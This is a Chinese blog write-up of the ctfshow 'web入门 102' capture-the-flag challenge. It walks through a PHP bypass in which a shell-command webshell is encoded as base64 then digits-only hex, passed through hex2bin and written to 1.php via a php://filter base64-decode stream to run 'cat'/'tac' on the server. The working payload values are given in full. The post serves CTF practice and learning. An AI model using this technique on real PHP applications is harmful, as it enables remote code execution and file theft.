ctfshow-web入门-102

2024-05-02 06:20
文章标签 入门 web ctfshow 102

本文主要是介绍ctfshow-web入门-102,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

这个题我想记录一下,主要是这个方法属实是有点惊艳到我了。故而进行记录,也为了方便大家阅读理解。

看题目,根据题目我写一下我的分析:

$_POST传入一个v1,$_GET传入一个v2,一个v3。

赋值符号=   优先级高于and,所以$v2=$v4

is_numeric — 检测变量是否为数字或数字字符。

bool is_numeric ( mixed $var )

如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE

substr — 返回字符串的子串

说明 

string substr( string $string, int $start[, int $length] )

返回字符串 string 由 start 和 length 参数指定的子字符串。

call_user_func — 把第一个参数作为回调函数调用

说明 

mixed call_user_func( callable $callback[, mixed $parameter[, mixed $...]] )

第一个参数 callback 是被调用的回调函数,其余参数是回调函数的参数。 

 file_put_contents — 将一个字符串写入文件

 

<?phphighlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){$s = substr($v2,2);$str = call_user_func($v1,$s);echo $str;file_put_contents($v3,$str);
}
else{die('hacker');
}?>

根据上面的函数解释再看一遍源代码。

分析出来:1、 $s = substr($v2,2);由此可知,返回$v2的前三位;

                  2、$str = call_user_func($v1,$s);由此可知$v1是函数,$s是参数

                  3、给v3一定要传入一个文件名字,这样才能构造出来一个接受$str的文件

原本我的想法是:$v3传1.php,$v1传system,但是卡在了$v2传不下去了

参考了大师傅的想法和各位万能的网友的wp后,感觉大有所获,来详细分享。

大师傅wp:

$a='<?=`cat *`;';
$b=base64_encode($a);  // PD89YGNhdCAqYDs=
$c=bin2hex($b);      //这里直接用去掉=的base64
 输出的是 5044383959474e6864434171594473

带e的话会被认为是科学计数法,可以通过is_numeric检测。
大家可以尝试下去掉=和带着=的base64解码出来的内容是相同的。因为等号在base64中只是起到填充的作用,不影响具体的数据内容。
 

 所以对应的我们可以反着来

同时在参考大家的wp的时候学到了一个知识点:在以上$c前加11可以使其在base64编码时产生乱码,可以绕过substr的截断,这点真的很重要。

POST传入:?v1=hex2bin     //这个是call_user_func的前面那个数,就是用作函数

GET传入:?v2=115044383959474e6864434171594473    //加入11造成base64编码前两位乱码绕过substr截断。

                ?V3=php://filter/write=convert.base64-decode/resource=1.php   //将被转化回去的base64数据再次进行解码,用php协议

hex2bin — 转换十六进制字符串为二进制字符串

bin2hex — 函数把包含数据的二进制字符串转换为十六进制值

总结:

传入参数前:首先构造一个命令----》其次将他base64加密----》然后把base64加密的字符串进行16进制转化

目的:构造一条全是数字的经过层层解密后可执行的数据

传入参数后:将原先的输出的全是数字的命令传入v2,并且加上11,绕过substr截断-----》然后再用v1的hex2bin将数字数据转化成base64数据-----》传入v3文件经过php://filter伪协议进行解密----》执行命令

目的:其实就是一个解密的过程

以下为此方法构造命令的新姿势,只是谈谈思路:

那么已经有了这种思路我们是否能够通过这种思路自己构造命令呢??

当然可行,试试。

 构造一条获取f*文件的命令,创建一个1.php文件

$a='<?=`cat f*`;';
$b=base64_encode($a); 
$c=bin2hex($b);     

执行代码,得到命令。

$a='<?=`cat f*`;';
$b=base64_encode($a);  
$c=bin2hex($b);    
输出   5044383959474e686443426d4b6d4137

不太行,有字母

不死心,再试试


$a='<?=`tac *`;';
$b=base64_encode($a); 
$c=bin2hex($b);

echo "$c";

输出的c值是504438395948526859794171594473

完美命令达成啦!!!没有字母真的一个也没有!!!

POST:v1=hex2bin

GET:?v2=504438395948526859794171594473&v3=php://filter/write=convert.base64-decode/resource=1.php

但是有点可惜的是并没有把flag回显出来虽然回显出来了东西

 

还是需要查看源代码才能看到flag,很可惜啊。 

 如果有师傅能直接回显出来flag的话,真的真的真的,请教教我,谢谢各位师傅啦!!!

这篇关于ctfshow-web入门-102的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/953570

相关文章

Spring Security 从入门到进阶系列教程

Spring Security 入门系列 《保护 Web 应用的安全》 《Spring-Security-入门(一):登录与退出》 《Spring-Security-入门(二):基于数据库验证》 《Spring-Security-入门(三):密码加密》 《Spring-Security-入门(四):自定义-Filter》 《Spring-Security-入门(五):在 Sprin

Java Web指的是什么

Java Web指的是使用Java技术进行Web开发的一种方式。Java在Web开发领域有着广泛的应用,主要通过Java EE(Enterprise Edition)平台来实现。  主要特点和技术包括: 1. Servlets和JSP:     Servlets 是Java编写的服务器端程序,用于处理客户端请求和生成动态网页内容。     JSP(JavaServer Pages)

数论入门整理(updating)

一、gcd lcm 基础中的基础,一般用来处理计算第一步什么的,分数化简之类。 LL gcd(LL a, LL b) { return b ? gcd(b, a % b) : a; } <pre name="code" class="cpp">LL lcm(LL a, LL b){LL c = gcd(a, b);return a / c * b;} 例题:

Java 创建图形用户界面(GUI)入门指南(Swing库 JFrame 类)概述

概述 基本概念 Java Swing 的架构 Java Swing 是一个为 Java 设计的 GUI 工具包,是 JAVA 基础类的一部分,基于 Java AWT 构建,提供了一系列轻量级、可定制的图形用户界面(GUI)组件。 与 AWT 相比,Swing 提供了许多比 AWT 更好的屏幕显示元素,更加灵活和可定制,具有更好的跨平台性能。 组件和容器 Java Swing 提供了许多

【IPV6从入门到起飞】5-1 IPV6+Home Assistant(搭建基本环境)

【IPV6从入门到起飞】5-1 IPV6+Home Assistant #搭建基本环境 1 背景2 docker下载 hass3 创建容器4 浏览器访问 hass5 手机APP远程访问hass6 更多玩法 1 背景 既然电脑可以IPV6入站,手机流量可以访问IPV6网络的服务,为什么不在电脑搭建Home Assistant(hass),来控制你的设备呢?@智能家居 @万物互联

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

poj 2104 and hdu 2665 划分树模板入门题

题意: 给一个数组n(1e5)个数,给一个范围(fr, to, k),求这个范围中第k大的数。 解析: 划分树入门。 bing神的模板。 坑爹的地方是把-l 看成了-1........ 一直re。 代码: poj 2104: #include <iostream>#include <cstdio>#include <cstdlib>#include <al

MySQL-CRUD入门1

文章目录 认识配置文件client节点mysql节点mysqld节点 数据的添加(Create)添加一行数据添加多行数据两种添加数据的效率对比 数据的查询(Retrieve)全列查询指定列查询查询中带有表达式关于字面量关于as重命名 临时表引入distinct去重order by 排序关于NULL 认识配置文件 在我们的MySQL服务安装好了之后, 会有一个配置文件, 也就

EasyPlayer.js网页H5 Web js播放器能力合集

最近遇到一个需求,要求做一款播放器,发现能力上跟EasyPlayer.js基本一致,满足要求: 需求 功性能 分类 需求描述 功能 预览 分屏模式 单分屏(单屏/全屏) 多分屏(2*2) 多分屏(3*3) 多分屏(4*4) 播放控制 播放(单个或全部) 暂停(暂停时展示最后一帧画面) 停止(单个或全部) 声音控制(开关/音量调节) 主辅码流切换 辅助功能 屏

音视频入门基础:WAV专题(10)——FFmpeg源码中计算WAV音频文件每个packet的pts、dts的实现

一、引言 从文章《音视频入门基础:WAV专题(6)——通过FFprobe显示WAV音频文件每个数据包的信息》中我们可以知道,通过FFprobe命令可以打印WAV音频文件每个packet(也称为数据包或多媒体包)的信息,这些信息包含该packet的pts、dts: 打印出来的“pts”实际是AVPacket结构体中的成员变量pts,是以AVStream->time_base为单位的显